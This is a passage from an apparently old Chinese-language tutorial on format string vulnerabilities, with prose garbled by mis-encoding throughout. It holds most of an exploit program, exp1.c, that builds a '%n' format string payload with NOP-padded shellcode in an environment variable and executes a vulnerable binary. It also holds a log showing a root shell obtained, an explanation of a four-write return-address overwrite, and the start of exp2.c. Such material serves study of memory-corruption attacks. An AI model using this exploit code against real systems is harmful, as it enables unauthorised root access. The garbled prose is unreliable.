聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

聽(tīng) if (argc > 1) sscanf(argv[1],"%x",&retloc);
聽(tīng) if (argc > 2) sscanf(argv[2],"%x",&shell_addr);
聽(tīng) if (argc > 3) align = atoi(argv[3]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 4) bsize聽(tīng)聽(tīng) = atoi(argv[4]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 5) eggsize = atoi(argv[5]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) printf("Usages: %s <RETloc> <SHELL_addr> <align> <buffsize> <eggsize> \n",argv[0]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (!(buff = malloc(bsize))) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) printf("Can't allocate memory.\n");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) exit(0);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) }聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

聽(tīng) if (!(egg = malloc(eggsize))) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) printf("Can't allocate memory.\n");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) exit(0);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) }聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) printf("Using RET location address: %#x\n", retloc);
聽(tīng) printf("Using Shellcode address: %#x\n", shell_addr);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) ptr = buff;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) memset(buff,'A',4);

聽(tīng) i = align;
聽(tīng) buff[i]聽(tīng)聽(tīng) =聽(tīng) retloc & 0x000000ff;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) buff[i+1] = (retloc & 0x0000ff00) >> 8;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) buff[i+2] = (retloc & 0x00ff0000) >> 16;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) buff[i+3] = (retloc & 0xff000000) >> 24;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)
聽(tīng) ptr = buff + i + 4;
聽(tīng) for(i = 0 ; i < 4 ; i++ )
聽(tīng)聽(tīng)聽(tīng) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) memcpy(ptr, "%.10u", 5);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) ptr += 5;
聽(tīng)聽(tīng)聽(tīng) }
聽(tīng)
sprintf(ptr, "%%.%uu%%n", shell_addr - 4*10 - 16);

聽(tīng) ptr = egg;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) *(ptr++) = NOP;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) for (i = 0; i < strlen(shellcode); i++)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) *(ptr++) = shellcode[i];聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) buff[bsize - 1] = '\0';聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) egg[eggsize - 1] = '\0';聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) memcpy(egg, "EGG=", 4);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) env[0] = egg ;
聽(tīng) env[1] = (char *)0 ;

聽(tīng) execle("./vul1","vul1",buff,NULL,env);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
}聽(tīng) /* end of main */聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

<- end ->聽(tīng)

榪欓噷鍞竴鏀瑰彉鐨勫氨鏄痵hellcode鐨勫湴鍧鎸囧悜浜?jiǎn)Heap/BSS鍖猴紝瀹冮氬父鍦ㄥ唴瀛樺尯鍩熺殑浣庣錛?br />0x8000000浠ュ悗鐨勫湴鍧,榪欎釜鍦板潃灝嗗彲浠ヨ姝g‘鏄劇ず錛屽洜姝ゅ氨鍙互姝g‘鐨勮鐩杕ain()鐨?br />榪斿洖鍦板潃錛屽茍璺沖埌閭i噷鍘繪墽琛屾垜浠殑shellcode.榪欎釜鍦板潃鐨勮幏鍙栵紝涔熷彲浠ラ氳繃gdb璺熻釜
寰楀埌錛岃繖閲屼笉鍐嶈禈榪般?br />
[root@rh62 /root]# ./exp1 0xbffffadc 0x8049800
Usages: ./exp1 <RETloc> <SHELL_addr> <align> <buffsize> <eggsize>
Using RET location address: 0xbffffadc
Using Shellcode address: 0x8049800

argv[1] = AA鑼5?.10u%.10u%.10u%.10u%.134518728u%n
bash#
寰堝ソ錛屾垚鍔熶簡(jiǎn)錛佹敞鎰忓湪寰楀埌#鍙鋒彁紺虹鍓嶏紝閫氬父闇瑕佺瓑寰呭嚑縐掗挓錛岃繖鏄洜涓烘樉紺?x8049800
涓瓧絎︿篃鏄闇瑕佷竴孌墊椂闂寸殑.(褰撶劧錛岀粨鏋滃茍娌℃湁鏄劇ず鍦ㄦ爣鍑嗚緭鍑轟笂) :-)

<2> 鏀誨嚮鏂規(guī)硶浜岋細(xì)澶氭瑕嗙洊榪斿洖鍦板潃(1)
====================================

涓婇潰鐨勭▼搴忓彧鑳藉湪RedHat 6.2榪欐牱鐨勭郴緇熶笂鎴愬姛錛屽湪RedHat 6.1涓嬪畠鏄笉鑳芥垚鍔熺殑銆傚師鍥?br />鍓嶉潰宸茬粡鎻愬埌浜?jiǎn)銆傞偅涔堟槸涓嶆槸鍦≧edHat 6.1涓嬪氨娌℃湁鍔炴硶浜?jiǎn)鍛㈠Q熷茍涓嶆槸榪欐牱鐨勶紝鍙鎴戜滑鍔?br />涓涓嬭剳絳嬶紝灝變細(xì)鍙戠幇鐢變簬榪欎釜闂紼嬪簭鑷韓鐨勭壒鐐詭儵棰愮獌璧梕dHat 6.1涓嬩篃鍙互鎴愬姛鐨勮繘琛?br />鏀誨嚮銆傛垜浠湅鍒伴棶棰樼▼搴弙ul.c浼?xì)鏄窘C哄茍璁板綍鎵鏈夌敤鎴瘋緭鍏ョ殑鍙傛暟錛岃屽埗綰︽垜浠殑鏀誨嚮紼嬪簭鐨?br />鍥犵礌灝辨槸鏄劇ず鐨勯暱搴︼紝閭d箞濡傛灉鎴戜滑涓嶆樉紺洪偅涔堛仌鍝皩鑽╃憛snprintf()鏄彲浠ユ甯稿伐浣滅殑錛?br />AA|RETloc|%.10u%.10u%.10u%.10u%.(shell_addr-4*10-16)u|%n
鎴戜滑棣栧厛鎯沖埌鐨勬椂鍊欏浣曞噺灝弒hell_addr鐨勫箋傚鏋滄垜浠皢涓涓猻hell_addr鍒嗘垚鍥涢儴鍒嗭細(xì)
shell_addr = (SH1 << 24) + (SH2 << 16) + (SH3 <<8) + SH4

渚嬪錛屽亣璁懼湪RETloc榪欎釜鍦板潃涓繚瀛樻湁榪斿洖鍦板潃0x44332211,鎴戜滑鎯沖皢榪欎釜0x44332211鎹㈡垚
瀛樻斁shellcode鐨勫湴鍧錛?xbffffcec,閭d箞鎴戜滑鎵瀵瑰簲鐨凷H1,SH2,SH3,SH4灝卞垎鍒槸錛?br />
SH1 = 0xbf
SH2 = 0xff
SH3 = 0xfc
SH4 = 0xec

鎴戜滑鎵瑕佸仛鐨勫氨鏄緷嬈″皢榪欏洓涓湴鍧瀛樺叆RETloc,RETloc+1,RETloc+2,RETloc+3涓幓錛屼篃灝辨槸錛?br />
AA|RETloc聽(tīng) |%.10u%.10u%.10u%.10u%.(SH4-4*10-16)u|%n
AA|RETloc+1|%.10u%.10u%.10u%.10u%.(SH3-4*10-16)u|%n
AA|RETloc+2|%.10u%.10u%.10u%.10u%.(SH2-4*10-16)u|%n
AA|RETloc+3|%.10u%.10u%.10u%.10u%.(SH1-4*10-16)u|%n

娉ㄦ剰錛氭垜浠冭檻鐨勬槸Intel x86鐨勭郴緇燂紝鍥犳錛屾帓鍒楅『搴忔槸鍙嶅簭鐨?br />涓嬪浘鍙互璁╀綘鏇存竻妤氱殑鐪嬪埌姣忎竴嬈¤鐩栧悗鐨勫彉鍖栵細(xì)

RETloc聽(tīng) RETloc+1 RETloc+2 RETloc+3
|0x11聽(tīng)聽(tīng) | 0x22聽(tīng)聽(tīng) | 0x33聽(tīng)聽(tīng) |0x44|聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 鍘熸潵瀛樻斁鐨勫湴鍧: 0x44332211
|0xec聽(tīng)聽(tīng) | 0x00聽(tīng)聽(tīng) | 0x00聽(tīng)聽(tīng) |0x00|聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 絎竴嬈¤鐩朣H4:聽(tīng) 0x000000ec
|0xec聽(tīng)聽(tīng) | 0xfc聽(tīng)聽(tīng) | 0x00聽(tīng)聽(tīng) |0x00| 0x00|聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 絎簩嬈¤鐩朣H3:聽(tīng) 0x0000fcec
|0xec聽(tīng)聽(tīng) | 0xfc聽(tīng)聽(tīng) | 0xff聽(tīng)聽(tīng) |0x00| 0x00| 0x00|聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 絎笁嬈¤鐩朣H2:聽(tīng) 0x00fffcec
|0xec聽(tīng)聽(tīng) | 0xfc聽(tīng)聽(tīng) | 0xff聽(tīng)聽(tīng) |0xbf| 0x00| 0x00| 0x00| 絎洓嬈¤鐩朣H1:聽(tīng) 0xbffffcec

闇瑕佺壒鍒敞鎰忕殑鏄細(xì)榪欐牱鍥涙瑕嗙洊涔嬪悗錛屽皢瀵艱嚧鍘熸潵瀛樻斁鍑芥暟鍙傛暟鐨勫湴鍧鍐呭琚竻闆訛紝
渚嬪RETloc+4,RETloc+5,RETloc+6絳夊錛屽鏋滆鍑芥暟鍦ㄨ鐩栦互鍚庝粛鐒墮渶瑕佽闂繖鍑犱釜鍙?br />鏁幫紝鍙兘浼?xì)瀵艰嚧鍑芥曨C笉鑳芥甯擱鍑猴紝鐗瑰埆鏄竴浜涙瀬绔緷璧栧嚱鏁板弬鏁扮殑鎯呭喌涓嬨?br />
鍙﹀涓涓棶棰樻槸紼嬪簭鏄惁鍏佽浣犺繛緇洓嬈¤繘琛岃鐩栵紝濡傛灉鍙兘瑕嗙洊涓嬈★紝涔熶笉鑳借揪鍒版垜浠?br />鐨勭洰鐨勶紝涓嶈繃鎴戜滑鐪嬪埌鎴戜滑鐨勯棶棰樼▼搴忔槸浼?xì)弩@鐜粠main()鐨勫弬鏁頒腑璇誨彇騫惰皟鐢╨og()瀛愬嚱鏁?br />錛岄偅涔堟垜浠彧瑕佹彁渚涘洓涓懡浠よ鍙傛暟灝卞彲浠ヨ繘琛屽洓嬈¤鐩栦簡(jiǎn)銆?br />
<- begin ->聽(tīng) exp2.c

#include <stdlib.h>聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#include <unistd.h>聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
